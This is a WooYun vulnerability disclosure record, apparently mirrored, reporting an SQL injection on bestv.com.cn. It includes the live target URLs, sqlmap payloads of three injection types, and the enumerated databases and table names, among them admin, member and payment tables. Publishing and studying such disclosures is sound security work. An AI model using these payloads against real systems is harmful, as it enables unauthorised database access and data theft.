乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-09: 细节已通知厂商并且等待厂商处理中 2015-06-14: 厂商已经主动忽略漏洞,细节向公众公开
233
1,http://www.bestv.com.cn/index.php?a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1&movie_special=1&movie_type=4&order=id 2,http://www.bestv.com.cn/index.php?a=lists&c=index&catid=27&m=content&modelid=11&platform=1
---Parameter: movie_category (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1 RLIKE (SELECT (CASE WHEN (3318=3318) THEN 1 ELSE 0x28 END))&movie_special=1&movie_type=4&order=id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1 AND (SELECT 2004 FROM(SELECT COUNT(*),CONCAT(0x71627a6271,(SELECT (ELT(2004=2004,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&movie_special=1&movie_type=4&order=id Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: a=lists&c=index&catid=27&channel=1&m=content&modelid=11&movie_category=1 AND (SELECT * FROM (SELECT(SLEEP(5)))dgbG)&movie_special=1&movie_type=4&order=id---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.3.3, Apache 2.2.3back-end DBMS: MySQL 5.0current user: 'bestvMan@%'current user is DBA: Trueavailable databases [8]:[*] BesTV[*] information_schema[*] mysql[*] ottcms[*] siteserver[*] test[*] wei7[*] xboxDatabase: BesTV[13 tables]+------------------+| Appstore || BesTV_User || WeiXin_File || WeiXin_FileCount || WeiXin_Group || WeiXin_GroupUser || WeiXin_KeyWord || WeiXin_Menu || WeiXin_Message || WeiXin_News || WeiXin_Reply || WeiXin_Users || visitorMessage |+------------------+Database: ottcms[154 tables]+-----------------------+| test2 || v9_activte || v9_activte_data || v9_admin || v9_admin_panel || v9_admin_role || v9_admin_role_priv || v9_app || v9_app_data || v9_attachment || v9_attachment_index || v9_badword || v9_bestv_user || v9_block || v9_block_history || v9_block_priv || v9_cache || v9_cart || v9_cart_now || v9_category || v9_category_priv || v9_client || v9_collection_content || v9_collection_history || v9_collection_node || v9_collection_program || v9_comment || v9_comment_check || v9_comment_data_1 || v9_comment_setting || v9_comment_table || v9_consignee || v9_content_check || v9_copyfrom || v9_datacall || v9_dbsource || v9_dianping || v9_dianping_data || v9_dianping_type || v9_download || v9_download_data || v9_downservers || v9_extend_setting || v9_favorite || v9_form_askJob || v9_hits || v9_hotshow || v9_hotshow_data || v9_ipbanned || v9_job || v9_job_data || v9_keylink || v9_keyword || v9_keyword_data || v9_link || v9_linkage || v9_live || v9_live_data || v9_live_store || v9_log || v9_medianum || v9_member || v9_member_detail || v9_member_group || v9_member_menu || v9_member_verify || v9_member_vip || v9_menu || v9_message || v9_message_data || v9_message_group || v9_model || v9_model_field || v9_module || v9_news || v9_news_data || v9_order || v9_order_back || v9_order_log || v9_ottvideo || v9_ottvideo_data || v9_page || v9_pay_account || v9_pay_payment || v9_pay_spend || v9_picture || v9_picture_data || v9_player || v9_position || v9_position_data || v9_poster || v9_poster_201305 || v9_poster_201306 || v9_poster_201307 || v9_poster_201308 || v9_poster_201309 || v9_poster_201310 || v9_poster_201311 || v9_poster_201401 || v9_poster_201402 || v9_poster_201403 || v9_poster_201404 || v9_poster_201405 || v9_poster_201406 || v9_poster_201407 || v9_poster_201408 || v9_poster_201409 || v9_poster_201410 || v9_poster_201411 || v9_poster_201412 || v9_poster_201501 || v9_poster_201502 || v9_poster_201503 || v9_poster_201504 || v9_poster_201505 || v9_poster_201506 || v9_poster_space || v9_product || v9_product_data || v9_productbuy || v9_queue || v9_release_point || v9_schedule || v9_search || v9_search_keyword || v9_session || v9_shuang11 || v9_shuang11_user || v9_site || v9_special || v9_special_c_data || v9_special_content || v9_sphinx_counter || v9_sso_admin || v9_sso_applications || v9_sso_members || v9_sso_messagequeue || v9_sso_session || v9_sso_settings || v9_tag || v9_template_bak || v9_times || v9_type || v9_urlrule || v9_video || v9_video_content || v9_video_data || v9_video_service || v9_video_store || v9_video_temp || v9_vote_data || v9_vote_option || v9_vote_subject || v9_workflow |+-----------------------+
~~~~~~~~~
危害等级:无影响厂商忽略
忽略时间:2015-06-14 11:40
漏洞Rank:4 (WooYun评价)
暂无